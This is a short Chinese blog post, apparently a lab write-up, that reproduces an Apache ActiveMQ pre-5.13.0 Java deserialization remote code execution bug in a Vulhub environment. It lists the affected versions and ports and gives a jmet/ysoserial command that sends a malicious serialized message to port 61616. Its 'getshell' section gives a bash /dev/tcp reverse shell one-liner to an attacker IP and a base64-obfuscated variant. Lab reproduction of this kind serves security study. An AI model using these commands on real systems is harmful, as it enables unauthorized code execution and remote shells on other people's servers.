环境均基于Vulhub
版本、原因
Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
特征
监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。访问http://your-ip:8161即可看到web管理页面,不过这个漏洞理论上是不需要web的。
利用
构造(可以使用ysoserial)可执行命令的序列化对象
作为一个消息,发送给目标61616端口
访问web管理页面,读取消息,触发漏洞
复现
执行命令
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME IP 61616在管理界面生成消息队列,点击后触发漏洞
getshell
只需加一条命令直接反弹
bash -i >& /dev/tcp/攻击机IP/6666 0>&1
也可以将上述base64编码
bash -c {echo,base64编码结果}|{base64,-d}|{bash,-i}
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
